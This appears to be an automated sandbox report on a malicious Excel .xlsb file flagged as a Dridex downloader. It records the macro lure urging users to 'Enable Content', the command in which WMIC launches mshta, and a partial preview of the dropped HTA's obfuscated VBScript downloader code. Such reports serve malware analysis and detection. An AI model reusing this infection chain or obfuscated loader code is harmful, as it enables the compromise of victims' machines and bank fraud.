Loading ...

Play interactive tourEdit tour

Windows Analysis Report 4310352755503838173672.xlsb

Overview

General Information

Sample Name:4310352755503838173672.xlsb
Analysis ID:532553
MD5:88a363b14590b0c0aab8d954ac3e1b5c
SHA1:af7b370945a8bcec0a979c93ef83770073f2b08a
SHA256:1004873035711456c20f311b16484154554d13e060dd2bbb2c0c2ddd4e73ced4
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Sigma detected: Suspicious WMI Execution
Detected potential crypto function
Creates a window with clipboard capturing capabilities
Contains functionality for execution timing, often used to detect debuggers

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2408 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 2704 cmdline: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 2804 cmdline: mshta C:\ProgramData\lvDMlIDBF.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\lvDMlIDBF.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2408, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", ProcessId: 2704
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2408, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", ProcessId: 2704

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 4310352755503838173672.xlsbVirustotal: Detection: 39%Perma Link
      Source: 4310352755503838173672.xlsbReversingLabs: Detection: 21%
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Source: EXCEL.EXE, 00000000.00000002.664195332.0000000005080000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: EXCEL.EXE, 00000000.00000002.664195332.0000000005080000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: EXCEL.EXE, 00000000.00000002.664195332.0000000005080000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: EXCEL.EXE, 00000000.00000002.664475601.0000000005267000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663229802.0000000003E27000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: EXCEL.EXE, 00000000.00000002.664475601.0000000005267000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663229802.0000000003E27000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000004.00000002.663426175.0000000004020000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.452533180.0000000001B00000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: EXCEL.EXE, 00000000.00000002.664475601.0000000005267000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663229802.0000000003E27000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: EXCEL.EXE, 00000000.00000002.664475601.0000000005267000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663229802.0000000003E27000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000004.00000002.663426175.0000000004020000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: EXCEL.EXE, 00000000.00000002.664195332.0000000005080000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: EXCEL.EXE, 00000000.00000002.664475601.0000000005267000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663229802.0000000003E27000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: EXCEL.EXE, 00000000.00000002.664195332.0000000005080000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CBB1296.pngJump to behavior
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\lvDMlIDBF.rtf, type: DROPPED

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING FROM YELLOW BAR ABOVE 4 Once you have clicked, please click "Enable Content" 5 6
      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED 2 Open this document with Desktop Version of Microsoft Office Excel. 3 CLICK
      Source: Screenshot number: 4Screenshot OCR: Enable Content" 5 6 8 ii h :: ' ' "" R a P 15 ? - 0 0 : : . ,-. .. . :: is ii B~~' .jgA=
      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING FROM YELLOW BAR ABOVE 4 Once you have clicked, please click "Enable Content" 5 6
      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED 2 Open this document with Desktop Version of Microsoft Office Excel. 3 CLICK
      Source: Screenshot number: 8Screenshot OCR: Enable Content" 5 6 8 ii h " '"'""""'" """ R " i^5'i """ ' " '" 15 \.:L/ ' 0 0 :: is " 19
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: 4310352755503838173672.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: 4310352755503838173672.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: EXCEL.EXE, 00000000.00000002.666097488.0000000005C17000.00000004.00000001.sdmpBinary or memory string: 0E&C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=C:=C:\Users\user\DocumentsALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=4OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=EWZCVGNUSERNAME=userUSERPROFILE=C:\Users\userWecVersionForRosebud.968=4windir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
      Found obfuscated Excel 4.0 MacroShow sources
      Source: 4310352755503838173672.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 26
      Source: 4310352755503838173672.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_021967530_2_02196753
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_021963400_2_02196340
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_021967430_2_02196743
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_021966F30_2_021966F3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_021966E80_2_021966E8
      Source: 4310352755503838173672.xlsbVirustotal: Detection: 39%
      Source: 4310352755503838173672.xlsbReversingLabs: Detection: 21%
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\lvDMlIDBF.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: EXCEL.EXE, 00000000.00000002.664195332.0000000005080000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$4310352755503838173672.xlsbJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD1DE.tmpJump to behavior
      Source: classification engineClassification label: mal96.troj.expl.evad.winXLSB@4/3@0/0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 4310352755503838173672.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: 4310352755503838173672.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: lvdmlidbf.rtfJump to behavior
      Source: unknownProcess created: cmd line: lvdmlidbf.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 1944Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 2212Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02196753 rdtsc 0_2_02196753
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02196753 rdtsc 0_2_02196753
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: EXCEL.EXE, 00000000.00000002.662748702.0000000000770000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.662731108.0000000001550000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.662577099.000000000014E000.00000004.00000001.sdmpBinary or memory string: Progman
      Source: EXCEL.EXE, 00000000.00000002.662748702.0000000000770000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.662731108.0000000001550000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: EXCEL.EXE, 00000000.00000002.662748702.0000000000770000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.662731108.0000000001550000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution2Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting3LSA SecretsSystem Information Discovery15SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      4310352755503838173672.xlsb40%VirustotalBrowse
      4310352755503838173672.xlsb11%MetadefenderBrowse
      4310352755503838173672.xlsb21%ReversingLabsDocument-Excel.Trojan.XBAgent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.%s.comPA0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckEXCEL.EXE, 00000000.00000002.664475601.0000000005267000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663229802.0000000003E27000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.comEXCEL.EXE, 00000000.00000002.664195332.0000000005080000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtEXCEL.EXE, 00000000.00000002.664195332.0000000005080000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAmshta.exe, 00000004.00000002.663426175.0000000004020000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.EXCEL.EXE, 00000000.00000002.664475601.0000000005267000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663229802.0000000003E27000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000004.00000002.663426175.0000000004020000.00000002.00020000.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.664475601.0000000005267000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663229802.0000000003E27000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oeEXCEL.EXE, 00000000.00000002.664195332.0000000005080000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllWMIC.exe, 00000002.00000002.452533180.0000000001B00000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/EXCEL.EXE, 00000000.00000002.664195332.0000000005080000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.663018995.0000000003C40000.00000002.00020000.sdmpfalse
                    high

                    Contacted IPs

                    No contacted IP infos

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:532553
                    Start date:02.12.2021
                    Start time:12:50:40
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 4m 55s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:4310352755503838173672.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal96.troj.expl.evad.winXLSB@4/3@0/0
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 5
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                    • Execution Graph export aborted for target EXCEL.EXE, PID 2408 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    12:51:39API Interceptor11x Sleep call for process: WMIC.exe modified
                    12:51:40API Interceptor453x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\lvDMlIDBF.rtf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4814
                    Entropy (8bit):5.043960662622874
                    Encrypted:false
                    SSDEEP:96:FOBD0klec+c4mT3TcIr+BnSR5DHbDiyYnGdCmoY3ymoCJ8:OxB45VU5vDijna2myay
                    MD5:F36D5F88F66FB329BE532A92C60C4723
                    SHA1:F61F29BF96EA340E7C09D40E9D1A8A0B068A42DE
                    SHA-256:B2A8E8D7B6C0B5DE835F54959A9291344D1DB2EA0C68988E482680B00E0A029E
                    SHA-512:EBA2A80C6C8EF73A22F97B02021610AA74D1E66D5C41D76880E83CC863DE5C1A0E7B9ABE67331119747E7DA8485705942CE03AE5B80BBBBBAEA36424874A91FF
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\lvDMlIDBF.rtf, Author: Joe Security
                    Reputation:low
                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..z_B_S_N_O_c_a = "wm" & Chr(105) & "" & "c p" & "ro" & "ces" & "s " & "cal" & Chr(108) & " c" & "re" & "" & "ate" & Chr(32) & Chr(34) & "run" & Chr(100) & "" & "ll3" & Chr(50) & ".ex" & "e C" & Chr(58) & "" & "\\P" & "ro" & "gra" & "mD" & "" & "ata" & "\s" & "" & Chr(110) & "" & "igg" & "" & "" & "er" & "" & Chr(46) & "bin" & " G" & Chr(101) & "tNT" & "Ver" & "sio" & Chr(110) & "" & Chr(34) & ""..Set a_E_o_X_s_L_v_k_D_M_W_J = CreateObject(Chr(77+1-1) & "SX" & Chr(77+1-1) & "" & Chr(76+1-1) & Chr(50+1-1) & Chr(46+1-1) & "Ser" & "ver" & "" & "XM" & Chr(76+1-1) & "HTT" & "P." & "" & "" & "" & Chr(54+1-1) & ".0")....y_i_V_z_t_Z_p_F_b_f_Z_D_y_S = "Ws" & "" & Chr(99+1-1) & "" & "" & "rip" & "" & "t.S" & Chr(104+1-1) & "" & Chr(101+1-1) & "ll" & ""
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CBB1296.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 800 x 400, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):46618
                    Entropy (8bit):7.952644920400089
                    Encrypted:false
                    SSDEEP:768:Luo+bYjgUZIXsg6KJLDTRxSKj91uKHacXGaFI9mJveLsTpqurZ1G8JawY1B:LujUjtZIcK9TjSK+ua7aFIMKIpq3HH
                    MD5:BD23AADA4497DF81DFF5354688F31E37
                    SHA1:666BAD186C4E60B5C2E35D9B4D5B636750873112
                    SHA-256:8460FE3B20B18F3BC0A7C66B29AB9AD503CB5DA8C511BC45987DAF4647E00560
                    SHA-512:6795A07A5FBD76D9F0A4E5056685585B3C66400E69AFB9139613DDA0A887F0018FBAD824C0377C9E1FA971A004911DF5474334824DA409EFEA6AB27092F14BCE
                    Malicious:false
                    Reputation:low
